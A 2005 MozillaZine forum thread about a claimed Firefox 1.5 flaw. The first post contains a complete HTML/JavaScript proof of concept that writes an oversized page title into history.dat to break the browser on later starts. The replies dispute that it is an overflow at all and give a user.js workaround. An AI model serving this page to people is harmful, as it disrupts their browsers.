MozillaZine

FireFox 1.5 Buffer overflow exploit

Discussion of bugs in Mozilla Firefox
markedmannerf
Guest
 

Post Posted December 7th, 2005, 6:15 am

This may Ive already been reported but Im going to post it here.

<!-- Firefox 1.5 buffer overflow

Basically firefox logs all kinda of URL data in it's history.dat file,
this little script will set a really large topic and Firefox will then
save that topic into it's history.dat.. The next time that firefox is
opened, it will instantly crash due to a buffer overflow -- this will
happen everytime until you manually delete the history.dat file -- which
most users won't figure out.

this proof of concept will only prevent someone from reopening
their browser after being exploited. DoS if you will. however, code
execution is possible with some modifcations.

Tested with Firefox 1.5 on Windows XP SP2.

ZIPLOCK <sickbeatz@gmail.com>

-->
<html><head><title>heh</title><script type="text/javascript">
function ex() {
var buffer = "";
for (var i = 0; i < 5000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 500; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}
</script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
</a></body></html>

name already taken

User avatar
 
Posts: 3124
Joined: February 27th, 2004, 9:54 am
Location: Utah

Post Posted December 7th, 2005, 7:36 am

You'll want to file a bug at https://bugzilla.mozilla.org/
"It burns like hygiene!"

hellene

User avatar
 
Posts: 5130
Joined: March 20th, 2005, 5:29 pm
Location: Bradford W.Yorks

Post Posted December 7th, 2005, 7:41 am

I'll shift this over to Firefox Bugs for further discussion. Interesting discovery. markedmannerf you will have to register a username if you want to post in that forum.
I don't know how to do any of this stuff, I just hire the guys that do
Have you considered reading the HELP folder. Right there on your menu bar.
Image by Juniper http onic.net/~daylight/ - Xmas special by Ol Grumpy

scratch

User avatar
 
Posts: 4942
Joined: November 6th, 2002, 1:27 am
Location: Massachusetts

Post Posted December 7th, 2005, 10:18 am

this is NOT the proper way to report a security bug.

please see http://www.mozilla.org/projects/securit ... olicy.html

mesostinky

User avatar
 
Posts: 215
Joined: November 4th, 2002, 10:44 pm
Location: NJ

Post Posted December 7th, 2005, 11:31 am

Is this your source?

http://packetstormsecurity.org/0512-exp ... erflow.txt

Hopefully they at least notified the security crew before they published this. Seeing as no update has been pushed out I assume not. How kinda of them.

Elfguy
 
Posts: 309
Joined: June 27th, 2005, 5:56 pm

Post Posted December 7th, 2005, 1:07 pm

It's on digg now http://digg.com/security/Kill_Firefox_1 ... te_exploit which means everyone knows.

VIPerous

User avatar
 
Posts: 120
Joined: September 20th, 2003, 5:15 am

Post Posted December 7th, 2005, 1:23 pm

Elfguy wrote:It's on digg now http://digg.com/security/Kill_Firefox_1 ... te_exploit which means everyone knows.

And here is one of the comments from Digg:

"And I can't believe you didn't see where the stack is involved. The size of whatever FF is reading is obviously BIGGER than whatever BUFFER is being used to store it, thus causing an OVERFLOW of that BUFFER."

How do YOU see where the stack is involved?

There is no buffer overflow and no threat of arbitrary code execution; Firefox does not crash when the script is executed, nor at startup when it reads history.dat.

The script causes a very large (~10MB) string to be written to history.dat (That's just a text file, you can open it in Notepad and take a look). The algorithm Firefox uses to parse this file was presumably not intended to handle such large strings and therefore takes a long time to load the file (1 to 2 mins).

It allocates a buffer on the heap of arbitrary size and begins reading the string. When it determines that the buffer is not big enough to hold the entire string it allocates a new, larger buffer, copies the old data to the new buffer, and continues reading. Repeat until you've allocated a buffer large enough to hold the entire 10MB string. Inefficient? Yes. Buffer overflow exploit? No."

Elfguy
 
Posts: 309
Joined: June 27th, 2005, 5:56 pm

Post Posted December 7th, 2005, 1:26 pm

It's not a "security issue" as there's no known way to exploit or run malicious code, all this does is cause Firefox to load much slower. Still I think this should be fixed fast and a 1.5.1 should be available within a week to reaffirm that open source releases fixes fast. It's a PR thing. Would be good to see if the update feature works fine too!

Unarmed
 
Posts: 4941
Joined: July 31st, 2003, 1:26 pm

Post Posted December 7th, 2005, 2:13 pm

One-line fix in user.js:
Code: Select all
user_pref("capability.policy.default.HTMLDocument.title.set", "noAccess");


Probably a few edge cases of legitimate sites not being able to set your window title, but screw ’em.

Elfguy
 
Posts: 309
Joined: June 27th, 2005, 5:56 pm

Post Posted December 7th, 2005, 2:23 pm


hellene

User avatar
 
Posts: 5130
Joined: March 20th, 2005, 5:29 pm
Location: Bradford W.Yorks

Post Posted December 8th, 2005, 2:47 pm

Thanks for picking up on this Elfguy and others. The OP started off in the user support forum - I figured the crew over here might have some more answers.
I don't know how to do any of this stuff, I just hire the guys that do
Have you considered reading the HELP folder. Right there on your menu bar.
Image by Juniper http onic.net/~daylight/ - Xmas special by Ol Grumpy

Spaceman-Spiff
 
Posts: 46
Joined: November 28th, 2002, 6:25 pm

Post Posted December 8th, 2005, 7:25 pm

Is this fix for the same buffer overflow mentioned in this page? http://forums.mozillazine.org/viewtopic.php?t=346858

Peng

User avatar
 
Posts: 778
Joined: November 9th, 2004, 2:31 pm
Location: Central Florida

Post Posted December 8th, 2005, 7:32 pm

Spaceman-Spiff wrote:Is this fix for the same buffer overflow mentioned in this page? http://forums.mozillazine.org/viewtopic.php?t=346858


They're two different problems.
Hug Peng
(aka Matt Nordhoff)
Check out: Adblock Plus | FoxClocks | OpenBook

Vallejo
 
Posts: 104
Joined: November 12th, 2004, 6:16 am

Post Posted December 9th, 2005, 4:17 am

Thanks, Unarmed, for the workaround -- that's a lot better than having to set my history to 0 days.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6

diilbert
 
Posts: 13
Joined: May 15th, 2005, 1:20 pm

Post Posted December 9th, 2005, 6:51 am

Unarmed wrote:One-line fix in user.js:
Code: Select all
user_pref("capability.policy.default.HTMLDocument.title.set", "noAccess");


Probably a few edge cases of legitimate sites not being able to set your window title, but screw ’em.


I am unable to find the user.js file.... I tried adding to the prefs.js w/o success... Any direction?

I am using XP SP2. Thanks.

Return to Firefox Bugs


Who is online

Users browsing this forum: No registered users and 2 guests